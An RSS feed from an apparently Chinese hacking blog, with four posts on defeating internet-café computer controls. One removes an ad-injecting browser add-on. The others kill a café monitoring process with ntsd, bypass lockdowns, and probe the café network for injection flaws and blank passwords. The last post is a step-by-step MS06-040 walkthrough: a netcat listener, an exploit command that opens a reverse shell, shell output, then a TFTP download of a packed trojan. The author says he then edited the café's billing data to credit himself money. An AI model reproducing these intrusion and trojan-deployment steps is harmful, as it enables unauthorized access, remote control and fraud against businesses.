<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>开心技术乐园 &#187; 网吧</title>
	<atom:link href="http://www.hack520.org/tag/%e7%bd%91%e5%90%a7/feed" rel="self" type="application/rss+xml" />
	<link>http://www.hack520.org</link>
	<description>原创技术乐园</description>
	<lastBuildDate>Tue, 20 Dec 2011 03:29:13 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.1</generator>
		<item>
		<title>『原创』网吧网页自动关闭？教你干掉网吧里顽固的ProcessSafe</title>
		<link>http://www.hack520.org/kill-processsafe-exe</link>
		<comments>http://www.hack520.org/kill-processsafe-exe#comments</comments>
		<pubDate>Tue, 02 Feb 2010 14:20:37 +0000</pubDate>
		<dc:creator>野球小子</dc:creator>
				<category><![CDATA[黑客地带]]></category>
		<category><![CDATA[网吧]]></category>

		<guid isPermaLink="false">http://www.hack520.org/kill-processsafe-exe</guid>
		<description><![CDATA[　　其实这篇文章前段时间就想写的，只是当时在网吧来不及写了，今天特地过来再操作一下把它写下来。那天晚上我来学校门口的冷雨网吧上网，想看部电影的，打开Tom365找到电影，发现网吧电脑没有安装Qvod播放器，顺着Tom365上的链接点进去想下载的，想不到网页自动关闭了。我知道那个下载地址是链接到雨林木风的xiazaiba的，于是我去Qvod Player官方下载，结果也很快自动关闭。这时我明白是网吧做了限制：不让用Qvod Player！根据窗口名来关闭相应的程序。原因很简单：Qvod太占用带宽资源了！我想经常在网吧混的朋友有不少也应该遇到过这种情况，不仅仅是网页自动关闭，还有软件自动关闭现象。 　　要是这点小问题都能难住我的话，我还怎么混呢？打开任务管理器，发现有个ProcessSafe.exe进程，看进程名感觉就是它搞的鬼。结束它，结果提示： 　　 　　这也是预料之中的。如果它这么容易就被结束，我还写个屁啊？好了，费话少说。怎么干掉它？强大的ntsd还记得吗？ntsd -c q -p我可是一直记得。打开我的Nohacker2009，找到ProcessSafe的PID为496，路径为E:\NBMSClient。 　　 　　ntsd -c q -p 496！提示等待30秒！ 　　 　　30秒后进程被Kill了。我马上打开qvod，结果还是自动关闭。查看进程，发现ProcessSafe.exe又回来了，看下图，PID已经换成了2580。怎么办？右击进程，点击“定位到此进程文件”找到ProcessSafe.exe文件。 　　 　　再来一下ntsd -c q -p 2580，30秒后马上删除ProcessSafe.exe，OK，搞定！再次打开Qvod下载页，没问题了，下载，安装，看电影喽！]]></description>
			<content:encoded><![CDATA[<p>　　其实这篇文章前段时间就想写的，只是当时在网吧来不及写了，今天特地过来再操作一下把它写下来。那天晚上我来学校门口的冷雨网吧上网，想看部电影的，打开Tom365找到电影，发现网吧电脑没有安装Qvod播放器，顺着Tom365上的链接点进去想下载的，想不到网页自动关闭了。我知道那个下载地址是链接到雨林木风的xiazaiba的，于是我去Qvod Player官方下载，结果也很快自动关闭。这时我明白是网吧做了限制：不让用Qvod Player！根据窗口名来关闭相应的程序。原因很简单：Qvod太占用带宽资源了！我想经常在网吧混的朋友有不少也应该遇到过这种情况，不仅仅是网页自动关闭，还有软件自动关闭现象。</p>
<p>　　要是这点小问题都能难住我的话，我还怎么混呢？打开任务管理器，发现有个ProcessSafe.exe进程，看进程名感觉就是它搞的鬼。结束它，结果提示：</p>
<p>　　<img alt="processsafe.exe进程" src="http://img.hack520.org/2010-02/taskmgr-processsafe.png" title="processsafe.exe进程" class="alignnone" width="404" height="417" /></p>
<p><span id="more-478"></span></p>
<p>　　这也是预料之中的。如果它这么容易就被结束，我还写个屁啊？好了，费话少说。怎么干掉它？强大的ntsd还记得吗？ntsd -c q -p我可是一直记得。打开我的<a href="http://www.hack520.org/nohacker-2009-beta" target="_blank">Nohacker2009</a>，找到ProcessSafe的PID为496，路径为E:\NBMSClient。</p>
<p>　　<img alt="nohacker2009" src="http://img.hack520.org/2010-02/nohacker2009.png" title="nohacker2009" class="alignnone" width="587" height="444" /></p>
<p>　　ntsd -c q -p 496！提示等待30秒！<br />
　　<a href="http://img.hack520.org/2010-02/ntsd-processsafe.png"><img alt="ntsd-processsafe" src="http://img.hack520.org/2010-02/ntsd-processsafe.png" title="ntsd-processsafe" class="alignnone" width="650" height="419" /></a></p>
<p>　　30秒后进程被Kill了。我马上打开qvod，结果还是自动关闭。查看进程，发现ProcessSafe.exe又回来了，看下图，PID已经换成了2580。怎么办？右击进程，点击“定位到此进程文件”找到ProcessSafe.exe文件。</p>
<p>　　<img alt="nohacker2009" src="http://img.hack520.org/2010-02/nohacker2009-2.png" title="nohacker2009" class="alignnone" width="587" height="444" /></p>
<p>　　再来一下ntsd -c q -p 2580，30秒后马上删除ProcessSafe.exe，OK，搞定！再次打开Qvod下载页，没问题了，下载，安装，看电影喽！</p>
]]></content:encoded>
			<wfw:commentRss>http://www.hack520.org/kill-processsafe-exe/feed</wfw:commentRss>
		<slash:comments>29</slash:comments>
		</item>
		<item>
		<title>网吧网页广告植入？教你轻松去除它</title>
		<link>http://www.hack520.org/wangbawangyeguanggao</link>
		<comments>http://www.hack520.org/wangbawangyeguanggao#comments</comments>
		<pubDate>Wed, 17 Jun 2009 13:16:25 +0000</pubDate>
		<dc:creator>野球小子</dc:creator>
				<category><![CDATA[系统安全]]></category>
		<category><![CDATA[网吧]]></category>

		<guid isPermaLink="false">http://www.hack520.org/%e8%bd%bb%e6%9d%be%e7%a0%b4%e9%99%a4%e7%bd%91%e5%90%a7%e7%94%b5%e8%84%91%e6%af%8f%e5%bc%a0%e7%bd%91%e9%a1%b5%e9%a1%b6%e9%83%a8%e4%b8%8a%e7%9a%84%e5%b9%bf%e5%91%8a%e6%8f%92%e5%85%a5</guid>
		<description><![CDATA[　　好久没来学校附近的网吧上网了，打开IE，发现每张网页顶部都被恶意植入了广告，如下图，是百度首页。 　　Google也一样，反正每打开一张网页，上方都被插入了广告。 　　一般来说有两种情况吧， 　　一是有恶意程序在运行，监视到每打开一张网页都进行插入广告操作，这种可能比较小； 　　二是IE中加入恶意的BHO，也就是浏览器辅助对象，可能最大了。 　　分析好后，去除网页顶部的广告就变得很简单了。打开“管理加载项”找到陌生的BHO，把它禁用。或者用我的Nohacker勾选那个陌生的BHO，修复一下即可！ 　　关闭浏览器，再重起就OK了！]]></description>
			<content:encoded><![CDATA[<p>　　好久没来学校附近的网吧上网了，打开IE，发现每张网页顶部都被恶意植入了广告，如下图，是百度首页。<br />
<img alt="百度首页被插入广告" src="http://img.hack520.org/attachments/month_0906/92009617124410.png" title="百度首页被插入广告" class="aligncenter" width="600" height="181" /></p>
<p><span id="more-426"></span><br />
　　Google也一样，反正每打开一张网页，上方都被插入了广告。<br />
<img alt="Google首页被插入广告" src="http://img.hack520.org/attachments/month_0906/k2009617124450.png" title="Google首页被插入广告" class="aligncenter" width="600" height="182" /></p>
<p>　　一般来说有两种情况吧，</p>
<p>　　一是有恶意程序在运行，监视到每打开一张网页都进行插入广告操作，这种可能比较小；</p>
<p>　　二是IE中加入恶意的BHO，也就是浏览器辅助对象，可能最大了。</p>
<p>　　分析好后，去除网页顶部的广告就变得很简单了。打开“管理加载项”找到陌生的BHO，把它禁用。或者用我的<a target="_blank" href="http://hack520.org/nohacker2009-beta">Nohacker</a>勾选那个陌生的BHO，修复一下即可！</p>
<p>　　关闭浏览器，再重起就OK了！</p>
<p><img alt="去除网吧网页广告" src="http://img.hack520.org/attachments/month_0906/l2009617131532.png" title="去除网吧网页广告" class="aligncenter" width="600" height="161" /></p>
]]></content:encoded>
			<wfw:commentRss>http://www.hack520.org/wangbawangyeguanggao/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>我的杭州网吧破解之旅~~</title>
		<link>http://www.hack520.org/hangzhou-wangba-pojie</link>
		<comments>http://www.hack520.org/hangzhou-wangba-pojie#comments</comments>
		<pubDate>Fri, 16 May 2008 19:42:00 +0000</pubDate>
		<dc:creator>野球小子</dc:creator>
				<category><![CDATA[黑客地带]]></category>
		<category><![CDATA[破解]]></category>
		<category><![CDATA[网吧]]></category>

		<guid isPermaLink="false">http://www.hack520.org/%e6%88%91%e7%9a%84%e6%9d%ad%e5%b7%9e%e7%bd%91%e5%90%a7%e7%a0%b4%e8%a7%a3%e4%b9%8b%e6%97%85</guid>
		<description><![CDATA[　　一直没有时间把它写出来，其实都过去一段日子了。上个学期期末考后，我没有直接回家，而是在学校呆了几天后才回。其间我还是去了杭州看我的鼻炎。想起上个学期真的很难忘，应该是我大学里最好的一学期了。不说其它的，上个学期我的鼻炎好了很多，让我看到了全愈的希望。这对我来说比任何其他事情都来的开心！ 　　那天由于是一早就过去挂号的，而我的专家门诊是在下午，所以我打算先到市一医院隔壁的网吧上下网，消磨点时间。第一次来杭州的网吧上网，不晓得有什么不一样的地方。很快就发现了，上网费就比我们这边贵多了，普通的液晶一个小时四块！ 　　我这个人已经不可能像其同学一样上网安安心心地看看电影聊聊天或玩游戏，我总是要搞点什么东西，哪怕是这个时候上网只是来消磨下时间。我决定来看看杭州网吧的安全性、破破杭州网吧的限制。开机后，我发现使用的是虚拟桌面： 这很正常的~不过我很讨厌虚拟桌面，下载东西存放时很不方便。 用虚拟桌面我看不到盘符，在浏览里输入C：来打开C盘，如图： 难道系统盘不在C盘？找了其它几个盘，也不没发现系统盘~ 打开文件夹选项查看，果然不出我所料，隐藏了。 可是我选中显示隐藏文件和系统文件后，发现C盘的内容还是照旧。再打开文件夹选项，发现隐藏系统文件和不显示隐藏文件又被自动打上勾了。真晕，这招是病毒的最爱，居然也用到网吧管理上面来了。 马上去改注册表，可是问题来了，现在是虚拟桌面，根本没有“运行”，CMD就更打不开了。其实搞这种网吧破解我觉得CMD是关键，只要能打开它，什么事都好办了。 这点倒是难不倒我，再怎么样你总不能限制我的IE浏览器吧！打开IE，直接文件&#8211;另存为，选择桌面： 看到真正的桌面了！上面还有个CMD，如何打开它？千万不要双击，而是要右击选择打开。打开之后我惊了一下，居然还要密码： 真是奇怪了，没事找事做~ 马上自己来制作一个CMD，保存到桌面上。右击打开： 逃不掉了吧！ 好了，CMD打开了，一切就好办了！ 哪个电脑高手不精通CMD命令？可见CMD在系统中的确非常重要！ 现在可以打开注册表了，把不显示隐藏文件的键值改过来，具体我不说了~ 再修改文件夹，打开C盘，现在C盘文件全部显示出来，网管真的把系统文件夹全部隐藏了： 我们继续，看看还有什么限制，打开任务管理器，显示出来的却是这么一个古怪的画面： 真够牛的！居然把微软的任务管理器改造成了这副模样！真的是这样吗？不可能吧？！ 这个任务管理器里的进程只能看，不能对它进行任务操作！ 打开CMD，输入TASKMGR，打开的还是这个丑八怪任务管理器。 仔细思考，管理员不可能有这么高深的技术把系统自带的任务管理器改成这个样子的。我突然想到是怎么回事了，打开C盘，搜索一taskmgr，看结果： system32下的333和444文件夹下居然也各有一个taskmgr！！ 想到是怎么回事了吗？ 对！333和444文件夹下的taskmgr应该才是真正的系统自带的任务管理器！ 打开 真相大白了！ 现在可以自由结束非系统进程了！ 接下来做什么呢？能打开注册表，可以修改很多东西，这里不一一提了。 当我想把放我的文档里的破解截图都备份好一份想删除掉的时候，却删不掉，什么提示我忘了。晕哦，难道网管想抓我的“作案”证剧？ 怎么删也删除不掉，更奇怪的是我重起了一下电脑，文档里我的截图居然没有被还原。网吧的系统盘不是都还原的吗？怪了！ 我想到了“我的文档”可能不是在C盘了。打开属性一看，果然， 网管把它定位到了D盘的下载区文件夹里，这样做的目标很明显是为了用户文档里的东西在重起后不会丢失。由于这个文件夹是网吧服务器上某个盘的映射，好像没有权限删除，可是我在CMD下却将它删了： 破解得差不多了，接下来是我“反击”了。 DOWN下阿D网络工具包，一扫，看看返回了什么结果： 网吧还架设了电影服务器，可是通过检测我发现了明显的注入漏洞： 我没有再搞下去，因为我发现网管不断在我附近转。而且也时间不多了，我要回市一医院去看专家了，应该差不轮到我了。 最后还有点时间，我研究了一下虚拟桌面，试图突破。我发现这个东西受网管软件的控制的，去除不掉，不过我找出虚拟桌面上所有的文件，其实都是些快捷方式，如图： 感觉杭州的这个网吧比我们那边的网吧限制多很多，不过多台服务器出现空口令，电影网站存在注入漏洞，可见安全性也不怎么样。 网吧破解最重要的是学技术，而不是搞破坏，否则后果可能会很严重。 本次网吧破解之旅结束。]]></description>
			<content:encoded><![CDATA[<p>　　一直没有时间把它写出来，其实都过去一段日子了。上个学期期末考后，我没有直接回家，而是在学校呆了几天后才回。其间我还是去了杭州看我的鼻炎。想起上个学期真的很难忘，应该是我大学里最好的一学期了。不说其它的，上个学期我的鼻炎好了很多，让我看到了全愈的希望。这对我来说比任何其他事情都来的开心！</p>
<p>　　那天由于是一早就过去挂号的，而我的专家门诊是在下午，所以我打算先到市一医院隔壁的网吧上下网，消磨点时间。第一次来杭州的网吧上网，不晓得有什么不一样的地方。很快就发现了，上网费就比我们这边贵多了，普通的液晶一个小时四块！</p>
<p>　　我这个人已经不可能像其同学一样上网安安心心地看看电影聊聊天或玩游戏，我总是要搞点什么东西，哪怕是这个时候上网只是来消磨下时间。我决定来看看杭州网吧的安全性、破破杭州网吧的限制。开机后，我发现使用的是虚拟桌面：<br />
<img src="http://img.hack520.org/attachments/month_0805/o2008516181127.png" class="aligncenter" alt="网吧破解" title="杭州网吧破解" width="600" height="123"/></p>
<p><span id="more-328"></span></p>
<p>这很正常的~不过我很讨厌虚拟桌面，下载东西存放时很不方便。</p>
<p>用虚拟桌面我看不到盘符，在浏览里输入C：来打开C盘，如图：<br />
<img src="http://img.hack520.org/attachments/month_0805/j200851615241.png" class="aligncenter" alt="网吧破解" title="杭州网吧破解" width="600" height="208"/></p>
<p>难道系统盘不在C盘？找了其它几个盘，也不没发现系统盘~</p>
<p>打开文件夹选项查看，果然不出我所料，隐藏了。<br />
<img src="http://img.hack520.org/attachments/month_0805/a2008516181938.png" class="aligncenter" alt="网吧破解" title="杭州网吧破解"/></p>
<p>可是我选中显示隐藏文件和系统文件后，发现C盘的内容还是照旧。再打开文件夹选项，发现隐藏系统文件和不显示隐藏文件又被自动打上勾了。真晕，这招是病毒的最爱，居然也用到网吧管理上面来了。</p>
<p>马上去改注册表，可是问题来了，现在是虚拟桌面，根本没有“运行”，CMD就更打不开了。其实搞这种网吧破解我觉得CMD是关键，只要能打开它，什么事都好办了。<br />
这点倒是难不倒我，再怎么样你总不能限制我的IE浏览器吧！打开IE，直接文件&#8211;另存为，选择桌面：<br />
<img src="http://img.hack520.org/attachments/month_0805/b2008516183243.png" class="aligncenter" alt="网吧破解" title="杭州网吧破解"/></p>
<p>看到真正的桌面了！上面还有个CMD，如何打开它？千万不要双击，而是要右击选择打开。打开之后我惊了一下，居然还要密码：<br />
<img src="http://img.hack520.org/attachments/month_0805/b2008516183455.png" class="aligncenter" alt="网吧破解" title="杭州网吧破解"/></p>
<p>真是奇怪了，没事找事做~</p>
<p>马上自己来制作一个CMD，保存到桌面上。右击打开：<br />
<img src="http://img.hack520.org/attachments/month_0805/32008516183749.png" class="aligncenter" alt="网吧破解" title="杭州网吧破解"/></p>
<p>逃不掉了吧！<br />
<img src="http://img.hack520.org/attachments/month_0805/02008516183857.png" class="aligncenter" alt="网吧破解" title="杭州网吧破解"/></p>
<p>好了，CMD打开了，一切就好办了！<br />
哪个电脑高手不精通CMD命令？可见CMD在系统中的确非常重要！</p>
<p>现在可以打开注册表了，把不显示隐藏文件的键值改过来，具体我不说了~</p>
<p>再修改文件夹，打开C盘，现在C盘文件全部显示出来，网管真的把系统文件夹全部隐藏了：<br />
<img src="http://img.hack520.org/attachments/month_0805/c2008516184258.png" class="aligncenter" alt="网吧破解" title="杭州网吧破解" width="600" height="249"/></p>
<p>我们继续，看看还有什么限制，打开任务管理器，显示出来的却是这么一个古怪的画面：<br />
<img src="http://img.hack520.org/attachments/month_0805/92008516184539.png" class="aligncenter" alt="网吧破解" title="杭州网吧破解"/></p>
<p>真够牛的！居然把微软的任务管理器改造成了这副模样！真的是这样吗？不可能吧？！</p>
<p>这个任务管理器里的进程只能看，不能对它进行任务操作！</p>
<p>打开CMD，输入TASKMGR，打开的还是这个丑八怪任务管理器。</p>
<p>仔细思考，管理员不可能有这么高深的技术把系统自带的任务管理器改成这个样子的。我突然想到是怎么回事了，打开C盘，搜索一taskmgr，看结果：<br />
<img src="http://img.hack520.org/attachments/month_0805/o2008516185213.jpg" class="aligncenter" alt="网吧破解" title="杭州网吧破解"/></p>
<p>system32下的333和444文件夹下居然也各有一个taskmgr！！</p>
<p>想到是怎么回事了吗？</p>
<p>对！333和444文件夹下的taskmgr应该才是真正的系统自带的任务管理器！</p>
<p>打开<br />
<img src="http://img.hack520.org/attachments/month_0805/f200851619111.png" class="aligncenter" alt="网吧破解" title="杭州网吧破解"/></p>
<p>真相大白了！</p>
<p>现在可以自由结束非系统进程了！</p>
<p>接下来做什么呢？能打开注册表，可以修改很多东西，这里不一一提了。</p>
<p>当我想把放我的文档里的破解截图都备份好一份想删除掉的时候，却删不掉，什么提示我忘了。晕哦，难道网管想抓我的“作案”证剧？</p>
<p>怎么删也删除不掉，更奇怪的是我重起了一下电脑，文档里我的截图居然没有被还原。网吧的系统盘不是都还原的吗？怪了！</p>
<p>我想到了“我的文档”可能不是在C盘了。打开属性一看，果然，<br />
<img src="http://img.hack520.org/attachments/month_0805/a200851619928.png" class="aligncenter" alt="网吧破解" title="杭州网吧破解"/></p>
<p>网管把它定位到了D盘的下载区文件夹里，这样做的目标很明显是为了用户文档里的东西在重起后不会丢失。由于这个文件夹是网吧服务器上某个盘的映射，好像没有权限删除，可是我在CMD下却将它删了：<br />
<img src="http://img.hack520.org/attachments/month_0805/k2008516192628.png" class="aligncenter" alt="网吧破解" title="杭州网吧破解"/></p>
<p>破解得差不多了，接下来是我“反击”了。</p>
<p>DOWN下阿D网络工具包，一扫，看看返回了什么结果：<br />
<img src="http://img.hack520.org/attachments/month_0805/d2008516192847.png" class="aligncenter" alt="网吧破解" title="杭州网吧破解"/></p>
<p>网吧还架设了电影服务器，可是通过检测我发现了明显的注入漏洞：<br />
<img src="http://img.hack520.org/attachments/month_0805/o2008516194347.png" class="aligncenter" alt="网吧破解" title="杭州网吧破解"/></p>
<p>我没有再搞下去，因为我发现网管不断在我附近转。而且也时间不多了，我要回市一医院去看专家了，应该差不轮到我了。</p>
<p>最后还有点时间，我研究了一下虚拟桌面，试图突破。我发现这个东西受网管软件的控制的，去除不掉，不过我找出虚拟桌面上所有的文件，其实都是些快捷方式，如图：<br />
<img src="http://img.hack520.org/attachments/month_0805/n2008516194424.png" class="aligncenter" alt="网吧破解" title="杭州网吧破解"/></p>
<p>感觉杭州的这个网吧比我们那边的网吧限制多很多，不过多台服务器出现空口令，电影网站存在注入漏洞，可见安全性也不怎么样。</p>
<p>网吧破解最重要的是学技术，而不是搞破坏，否则后果可能会很严重。</p>
<p>本次网吧破解之旅结束。</p>
]]></content:encoded>
			<wfw:commentRss>http://www.hack520.org/hangzhou-wangba-pojie/feed</wfw:commentRss>
		<slash:comments>10</slash:comments>
		</item>
		<item>
		<title>『原创』我用MS06040拿下网吧主机</title>
		<link>http://www.hack520.org/ms06040</link>
		<comments>http://www.hack520.org/ms06040#comments</comments>
		<pubDate>Fri, 30 Mar 2007 13:59:18 +0000</pubDate>
		<dc:creator>野球小子</dc:creator>
				<category><![CDATA[黑客地带]]></category>
		<category><![CDATA[原创]]></category>
		<category><![CDATA[网吧]]></category>

		<guid isPermaLink="false">http://www.hack520.org/%e6%88%91%e7%94%a8ms06040%e6%8b%bf%e4%b8%8b%e7%bd%91%e5%90%a7%e4%b8%bb%e6%9c%ba</guid>
		<description><![CDATA[　　今天是是中秋节，很开心，我昨天做的动画教程在新世纪网安基地发表了。我极少做动画，这是我第一次做动画上传黑客站点，就成功发表了！ 下载地址为: http://520hack.com/donghua/donghua4/200610/3002.html（链接已失效，郁闷~~） 　　动画教程文字说明如下： 大家好,我是野球小子,论坛ID:35483.我是嘉兴南湖学院的,在我们这里好像找不到一个志同道合学黑客技术的人,所以我非常希望能和大家一起交流学习.我的QQ75229219 我很少做动画,只索取却不做点贡献肯定是不行的,新世纪网安基地是个非常不错的学习乐园,希望大家多去光顾 好了,费话不多说,我们开始吧 现在是国庆长假,我是在家乡嵊州的红蜻蜓网吧 今天给大家做的是简单利用微软漏洞MS06040入侵网吧主机,关于MS06040我就不多说了,大家都应该了解的 下面看我操作吧 192.168.0.167我的IP 我们拿出MS06-040 Scanner对整个网吧进行扫描 扫描开始了,为了不浪费大家时间,我已经扫好了 看到这样的扫描结果就说明它存在漏洞 目标192.168.0.250 下面我们对它进行溢出 工具我都放在C盘了 nc -l -vv -p 888让NC监听888端口 下面我们再开一个CMD,用来进行溢出操作 ms06040rpc 192.168.0.250 192.168.0.167 888 1这是溢出命令,不用我多说了吧 看好了 C:\>nc -l -vv -p 888 listening on [any] 888 &#8230; connect to [192.168.0.167] from PUBWINEP [192.168.0.250] 4877 Microsoft Windows 2000 [Version 5.00.2195] (C) 版权所有 1985-2000 [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://img.hack520.org/attachments/month_0703/hacker.jpg" target="_blank"><img src="http://img.hack520.org/attachments/month_0703/hacker.jpg" class="aligncenter" alt="入侵网吧主机" title="入侵网吧主机" width="600" height="450"/></a><br />
<span id="more-16"></span><br />
　　今天是是中秋节，很开心，我昨天做的动画教程在新世纪网安基地发表了。我极少做动画，这是我第一次做动画上传黑客站点，就成功发表了！<br />
下载地址为:</p>
<p>http://520hack.com/donghua/donghua4/200610/3002.html（链接已失效，郁闷~~）</p>
<p>　　动画教程文字说明如下：</p>
<blockquote>大家好,我是野球小子,论坛ID:35483.我是嘉兴南湖学院的,在我们这里好像找不到一个志同道合学黑客技术的人,所以我非常希望能和大家一起交流学习.我的QQ75229219<br />
我很少做动画,只索取却不做点贡献肯定是不行的,新世纪网安基地是个非常不错的学习乐园,希望大家多去光顾</p>
<p>好了,费话不多说,我们开始吧<br />
现在是国庆长假,我是在家乡嵊州的红蜻蜓网吧<br />
今天给大家做的是简单利用微软漏洞MS06040入侵网吧主机,关于MS06040我就不多说了,大家都应该了解的<br />
下面看我操作吧</p>
<p>192.168.0.167我的IP<br />
我们拿出MS06-040 Scanner对整个网吧进行扫描<br />
扫描开始了,为了不浪费大家时间,我已经扫好了<br />
看到这样的扫描结果就说明它存在漏洞<br />
目标192.168.0.250<br />
下面我们对它进行溢出<br />
工具我都放在C盘了<br />
nc -l -vv -p 888让NC监听888端口<br />
下面我们再开一个CMD,用来进行溢出操作<br />
ms06040rpc 192.168.0.250 192.168.0.167 888 1这是溢出命令,不用我多说了吧<br />
看好了</p>
<p>C:\>nc -l -vv -p 888<br />
listening on [any] 888 &#8230;<br />
connect to [192.168.0.167] from PUBWINEP [192.168.0.250] 4877<br />
Microsoft Windows 2000 [Version 5.00.2195]<br />
(C) 版权所有 1985-2000 Microsoft Corp.</p>
<p>C:\WINNT\system32></p>
<p>溢出成功,看到了吧</p>
<p>下面我们给它传马儿,我用的是上兴<br />
首先是配置,我们给它加个壳<br />
好,接下去就上传我们的马儿<br />
不好意思,我忘了准备上传工具<br />
本地架设TFTP服务器,接下来在SHELL下上传,命令tftp -i 192.168.0.167 get 11.exe<br />
因为我已经上传过一次11.exe,所以这次我们改个名<br />
Transfer successful: 139776 bytes in 1 second, 139776 bytes/s这句都看得懂吧<br />
我们运行一下服务端<br />
最后我们打开上兴看看它上线没有<br />
我们修改一下端口,我刚才用的是800端口<br />
看到了吧,成功!192.168.0.250我们看看它的屏幕<br />
哈哈,果然是网吧的主机<br />
现在就可以下载它的数据库给自己加钱了,可惜我不是这个网吧的会员,所以我就不演示了<br />
好了,教程就到这里吧,大家88</blockquote>
<p>　　这次十一假期回家，上过家乡三个网吧（因为电脑搬去了学校，所以只好跑网吧），没想到都被我入侵了。我还做了其中一家网吧的会员，拿下主机给自己加了10块钱（不多的吧，只是学习学习，没有恶意搞破坏的哦）。这在半年前是想都不敢想的事，毕竟我的技术零起点还是在今天五一的那个长假。当时的我不要说黑客，对基本的网络技术都不一窍不通。一本去年11月份的黑客X档案激发我的兴趣，从此不发不可收拾，学得很认真，也付出了不少，还挂了课（要知道我大一上学期还拿奖学金，下学期居然挂了一门，当然也不全是因为学技术）这些说起来话就多了&#8230;&#8230;现在在学校我好像成了一个小黑客了，呵呵，不过我知道跟网上的比我还差得远呢，我会不断努力的，伟伟，加油哈！<br />
2006.10.6</p>
]]></content:encoded>
			<wfw:commentRss>http://www.hack520.org/ms06040/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>

